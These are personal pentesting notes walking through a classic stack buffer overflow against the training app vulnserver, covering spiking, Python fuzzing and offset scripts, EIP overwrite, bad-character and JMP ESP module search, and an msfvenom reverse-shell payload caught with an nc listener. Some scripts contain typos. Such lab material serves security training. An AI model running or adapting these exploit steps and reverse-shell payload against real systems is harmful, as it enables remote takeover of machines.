Notes
Search…
Notes
Resources
Web PenTesting / Bug Bounty
Bug Bounty Methodology
XSS
XXE
Exploit Development / BoF
Pwntools
Buffer Overflows
Powered By GitBook
Buffer Overflows

Requirements

Windows - OS (7-10) vulnserver Immunity Debugger

What is BoF?

Anatomy of memory:
  • Kernel
  • Stack
  • Heap
  • Data
  • Text
Overflowing the Buffer Space in stack and reach other levels allowing to control them

Steps of BoF

  1. 1.
    Spiking
  2. 2.
    Fuzzing
  3. 3.
    Finding the offset (find the break point)
  4. 4.
    Overwriting the EIP
  5. 5.
    Finding bad characters
  6. 6.
    Finding the Right Module
  7. 7.
    Generating the shellcode
  8. 8.
    Root <->

1. Spiking

Open vulnserver using the debugger to see what breaks and so on
  • From kali
Connect to {ip 9999} using nc Next up we put a bunch of characters to see if we can crash an app using a certain command. generic_send_tcp ^ send a TCP request with our characters and test it Now we create a file {something}.spk and put this in there:
1
s_readline();
2
s_string("STATS ");
3
s_string_variable("0");
Copied!
STATS <- in this case, should be replaced with the command name to make it specific
Command to send the spike: generic_send_tcp {ip} {port} file.spk 0 0 TRUN command appears to be vulnerable

2. Fuzzing

TRUN is vulnerable so we can now attack it Python fuzzing script
1
#!/usr/bin/python
2
import sys, socket
3
from time import sleep
4
buffer = "A" * 100
5
while True:
6
try:
7
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
8
s.connect(('{IP}',{PORT}))
9
10
s.send(('TRUN /.:/' + buffer))
11
s.close()
12
sleep(1)
13
buffer = buffer + "A"*100
14
except:
15
print "Fuzzing crashed at %s bytes" % str(len(buffer))
16
sys.exit
Copied!

3. Finding the offset

Here we want to find the place which we override with the characters tool: /usr/share/metasploit-framework/exploit/pattern_create.rb Command used:
1
/usr/share/metasploit-framework/exploit/pattern_create.rb -l 3000
2
# -l = length
3
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
Copied!
Copy the output -> modify the script by replacing offset with the characters and remove the while loop (offset is buffer in the old script) Script should look like this:
1
#!/usr/bin/python
2
import sys,socket
3
offset = "{output from pattern_create}"
4
try:
5
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
6
s.connect(('{IP}',{PORT}))
7
s.send(('TRUN /.:/' + offset))
8
s.close()
9
except:
10
print "Error connecting to the server"
11
sys.exit()
Copied!
In the debugger, we could see that 386F4337 appears to be vulnerable Now, let's try something more specific
1
/usr/share/metasploit-framework/exploit/pattern_offset.rb -l 3000 -q 386F4337
2
3
# -l = length
4
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
5
# -q emphasizes the target
Copied!
Output: 2003 <- We can start controlling the EIP with this amount. (Exactly what we wanted)

4. Overwriting the EIP

Editing the script
1
#!/usr/bin/python
2
import sys,socket
3
4
shellcode = "A" * 2003 + "B" * 4
5
# 2003 A - when we start overwriting the EIP
6
7
try:
8
s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
9
s.connect(('{IP}',{PORT}))
10
s.send(('TRUN /.:/' + shellcode))
11
s.close()
12
except:
13
print "Error connecting to the server"
14
sys.exit()
Copied!

5. Finding Bad Characters

  • google "badchars" -> Bulbsecurity.com
  • Copy-paste the badchars variable
  • Add badchars to the script as a separate varible
  • Add + badchars to shellcode
Look at the debugger hex dump output If something is off - it's a bad character; Lack of bad characters is what we need

6. Finding the right module

Tool: github.com/corelan/mona Save that script to the machine at C:\ProgramFiles(x86)\ImmunityInc\ImmunityDebugger\PyCommands Type !mona modules in the ImmunityDebugger
In kali: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb We want to convert Assembly code to Hex Type command JMP ESP -> take FFE4
Go back to immunity debugger and change !mona modules to !mona find -s "\xff\xe4" -m essfunc.dll
Modify the python script and remove badchars -> Change "B" *4 to "\xaf\x11\x50\x62"

7-8. Generating Shellcode and Getting Root

Tool: msfvenom Command: msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"
1
Notes on the command:
2
# set the module = windows reverse tcp
3
# LHOST & LPORT = kali ip and port
4
# Exitfunc = for stability
5
# -b = bad characters (needs to be set or changed accordingly)
Copied!
Copy and paste the output to our python code
  • Make it a separate varible and add to the shellcode + overflow
  • To be 100% sure, it's good to add + "\x90" * 32 before the `+overflow+
-> Set up nc listener -> Run the script

Additional: BoF templates

Previous
Pwntools
Last modified 1yr ago
Copy link
Contents
Requirements
What is BoF?
Steps of BoF
1. Spiking
2. Fuzzing
3. Finding the offset
4. Overwriting the EIP
5. Finding Bad Characters
6. Finding the right module
7-8. Generating Shellcode and Getting Root
Additional: BoF templates